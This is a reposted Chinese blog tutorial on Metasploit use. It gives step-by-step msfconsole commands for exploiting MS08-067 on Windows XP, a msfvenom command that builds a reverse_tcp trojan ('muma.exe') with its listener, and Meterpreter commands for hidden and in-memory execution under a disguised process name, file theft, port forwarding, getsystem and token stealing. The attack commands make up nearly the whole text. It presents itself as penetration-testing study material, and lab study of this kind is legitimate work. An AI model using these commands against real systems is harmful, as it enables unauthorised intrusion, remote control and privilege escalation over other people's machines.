(msf使用)msfconsole - meterpreter


⭐【msf】 msfconsole meterpreter


對於這款強大滲透測試框架,詳情介紹可看這里:metasploit 使用教程


對於msfconsole, Kali Linux 自帶。只需用命令行啟動便可。


⭐msfconsole 啟動不了/初次使用


service postgresql start     # 啟動數據庫服務
msfdb init             # 初始化數據庫
msfconsole             # 啟動metasploit

【注】msfconsole 不會就用 msfconsole -h msf5 > help 查看幫助


⭐ms08-067漏洞攻擊實踐


ifconfig 命令 可 查看kail 系統ip ipconfig 查看 Windows ip

kali: 192.168.xxx.xxx (攻擊靶機)


windows xp xxx : 192.168.xxx.xxx (被攻擊靶機)


msfconsole - 進入


msfconsole


紅框中 標記的是:Metasploit所有的利用模塊、payload、post模塊等等模塊


search - 查看漏洞


search ms08_067


use - 使用漏洞


use exploit/windows/smb/ms08_067_netapi

show - 查看可以攻擊的靶機操作系統型號(targets)


show targets

set - 設置target 參數


xx是對應被攻擊靶機的型號


set target xx

set - 設置rhost參數


此ip為被攻擊靶機的ip地址


set rhost 192.168.xxx.xxx

show - 查看參數


show options


exploit - 進行攻擊


exploit


session 查看目前服務器端會話

sessions -i


啟動x會話 。

sessions -i x


之后用 meterpreter 命令,轉 shell 命令

shell

back - 實現返回


back


查看 payload

show payloads

⭐利用msfvenom生成木馬攻擊靶場


【參考鏈接】: i春秋 Meterpreter綜合提權


msfvenom 生成 .exe 文件


msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.xxx.xxx lport=yyyy -f exe -o /tmp/muma.exe
windows/meterpreter/reverse_tcp : payload
lhost :木馬反彈到的監聽端地址=192.168.xxx.xxx
lport :監聽端口=yyyy

常見 msfvenom 命令參數如下:


-p 選擇一個載荷(payload)


-l 載荷列表


-f 生成的文件格式


-e 編碼方式


-i 編碼次數


-b 在生成的程序中避免出現的值


-h 幫助


用msfconsole監聽


選用 exploit/multi/handler 監聽模塊


use exploit/multi/handler

設置payload:


set payload windows/x64/meterpreter/reverse_tcp

設置 監聽ip地址以及監聽端口:


set lhost 192.168.xxx.xxx

set lport yyyy

查看設置參數:


show options

開啟配置模塊進行監聽


exploit



⭐Meterpreter


Meterpreter命令詳解


常見命令


upload - 上傳文件


上傳1.txt到目標靶機c:\muma\下


upload 1.txt c:\\muma\\


download - 下載目標靶機相對應權限的任意路徑下的文件


命令 download file path


download c:\\muma\\1.txt

sysinfo 命令:


顯示遠程主機的系統信息,顯示計算機、系統信息、結構、語言等信息。


運行目標主機上的cmd.exe程序,以隱藏的方式直接交互到meterpreter會話上


execute  -H -i -f cmd.exe

execute  -H -m -d notepad.exe-f  muma.exe -a "-o muma.txt"

-d 在目標主機執行時顯示的進程名稱(用以偽裝)

-m 直接從內存中執行

"-o muma.txt"是muma.exe的運行參數

網絡命令


portfwd 命令:


portfwd add -l yyyy -p zzzz -r 192.168.xxx.xxx # 端口轉發,本機監聽yyyy,把目標機zzzz轉到本機yyyy

netstat -an | grep"yyyy" #查看指定端口開放情況

基礎提權


getsystem


利用 ps 命令查看目標靶機當前進程


找到管理員相應PID。若PID:xxxx


steal_token xxxx
#盜取guanliyuan
getuid
#檢查是否成功
shell

【侵權刪】


【轉載請放鏈接】 https://www.cnblogs.com/Jlay/p/msf.html


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM